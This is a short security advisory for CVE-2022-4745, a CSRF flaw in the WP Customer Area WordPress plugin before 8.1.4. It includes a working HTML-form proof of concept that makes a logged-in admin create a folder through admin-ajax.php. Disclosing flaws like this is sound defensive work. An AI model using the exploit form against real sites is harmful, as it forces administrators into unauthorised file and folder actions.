WP Customer Area < 8.1.4 – Unauthorised Actions via CSRF | CVE 2022-4745

Description

The plugin does not have CSRF checks when performing some actions such as chmod, mkdir and copy, which could allow attackers to make a logged-in admin perform them and create arbitrary folders, copy file for example.

Proof of Concept

<html><form enctype="application/x-www-form-urlencoded" method="POST" action="https://example.com/wp-admin/admin-ajax.php"><table><tr><td>action</td><td><input type="text" value="cuar_folder_action" name="action"></td></tr>
<tr><td>folder_action</td><td><input type="text" value="mkdir" name="folder_action"></td></tr>
<tr><td>path</td><td><input type="text" value="/var/www/html/wp-content/tmpp" name="path"></td></tr>
<tr><td>extra</td><td><input type="text" value="0770" name="extra"></td></tr>
</table><input type="submit" value="https://example.com/wp-admin/admin-ajax.php"></form></html>